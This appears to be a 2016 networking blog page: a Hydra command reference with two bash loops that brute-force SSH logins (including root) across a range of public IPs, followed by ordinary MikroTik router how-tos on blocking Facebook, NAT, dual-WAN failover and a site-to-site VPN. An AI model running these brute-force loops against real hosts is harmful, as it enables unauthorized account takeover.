Monday, March 28, 2016

Hydra - Commands

Hydra - Commands

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT                 ] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Sample 1: Log in with user: root from the random password file
#!/bin/bash
for i in 124.124.124.{167..205}
do
hydra $i ssh -l root -P top50.txt -s 22 -vV
done

Sample2: Log in with the random users and passwords from file
#!/bin/bash
for i in 124.124.124.{167..205}
do
hydra -L /opt/hydra/users.txt -P /opt/hydra/passwords.txt -e ns -v -o /opt/hydra/hashcrack-ssh.txt $i  ssh
done

Ok, Let go on more.

MikroTik - How To Block Facebook

MikroTik - How To Block Facebook

Block Facebook Webpage Base Content String:

IP --> Firewall --> Firewall Rule --> New Firewall Rule








MikroTik - Allow Remote Desktop From External

Allow Remote Desktop From External

IP --> Firewall --> NAT

Create new NAT
Tab,   General 
Tab,  Action

Done,

Sunday, March 27, 2016

MikroTik Fail Over Dual WAN

MikroTik Fail Over Dual WAN

This is a Lab Scenario, We have 2 IP address with 2 Gateway to Internet as above.
Here We go:
* 8.8.8.8 = Public Google DNS
221.132.112.8 = TW DNS (PK)

 1.    Login
Login with user (admin) and (no password)

2. Set New Password
psswor
3.  Set Hostname
system  identity set name=HQ-MKT6.30
4. Set IP, DNS , Gateway and NAT
ETHER1
interface Ethernet set name=ISP1 ether1
ip address add address=124.248.161.61/29 disabled=no interface=ISP1
ip dns set servers=8.8.8.8 allow-remote-request=yes
ip route add gateway=124.248.161.62 check-gateway=ping
ip firewall nat add action=masquerade chain=srcnat disabled=no out-interface=ISP1

ETHER2
interface Ethernet set name=LAN172 ether2
ip address add address=172.16.5.254/24 disabled=no interface=LAN172

ETHER3
interface Ethernet set name=ISP2 ether3
ip address add address=124.248.160.209/28 disabled=no interface=ISP2
ip dns set servers=221.132.112.8 allow-remote-request=yes
ip route add gateway=124.248.160.222 check-gateway=ping
ip firewall nat add action=masquerade chain=srcnat disabled=no out-interface=ISP2

5. Configure Load Balance
ip route add dst-address=8.8.8.8 gateway=124.248.161.62 scope=10
ip route add dst-address=221.132.112.8 gateway=124.248.160.222 scope=10
ip route add distance=1 gateway=8.8.8.8 check-gateway=ping
ip route add distance=2 gateway=221.132.112.8 check-gateway=ping                                           

That All, Done.

Wednesday, March 23, 2016

MikroTik VPN site-to-site

MikroTik VPN site-to-site

This is the IP diagram, and doing on only the HQ-MikroTik guideline,
for the BR01-MikroTik just doing the same, just revers IP. 

 Test ping from HQ to Branch, 

 Test ping from Branch to HQ, 

Done, ;)